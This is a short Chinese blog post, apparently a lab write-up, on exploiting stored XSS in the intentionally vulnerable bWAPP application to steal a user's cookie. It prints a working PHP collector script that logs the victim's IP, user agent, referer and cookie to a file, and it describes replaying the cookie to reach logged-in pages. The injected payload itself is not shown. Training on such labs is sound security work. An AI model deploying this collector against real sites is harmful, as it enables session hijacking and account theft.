bwapp之xss(blog)
存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。
实验内容:通过存储型xss漏洞获取用户cookie
靶机:192.168.1.104(bwapp)
客户机:192.168.1.103(win7)
存放获取cookie脚本的服务器:192.1681.109(ubuntu)
获取cookie的php文件代码:
1 <?php 2 $ip = $_SERVER['REMOTE_ADDR']; 3 $user_agent = $_SERVER['HTTP_USER_AGENT']; 4 $referer = $_SERVER['HTTP_REFERER']; 5 $cookie = $_GET['hack']; 6 $content = "ip: ".$ip."\nuser_agent: ".$user_agent."\nreferer: ".$referer."\ncookie: ".$cookie."\n"; 7 $file = fopen("data.txt","a"); 8 fwrite($file,$content); 9 fclose($file); 10 header("location: http://www.baidu.com"); 11 ?>
访问靶机系统:http://192.168.1.104/bWAPP/xss_stored_1.php
输入payload
用户192.168.1.103将在访问这个页面的时候向服务器提交cookie
服务器收到请求后会在当前目录创建一个名为data.txt的文件,存放获取到的内容,其文件内容为:
现在我们已经获取到了cookie,接下来可以使用cookie访问用户登录之后才可以访问到的内容
本文固定链接:http://www.cnblogs.com/hell0w/p/7528926.html 转载请注明出处,谢谢!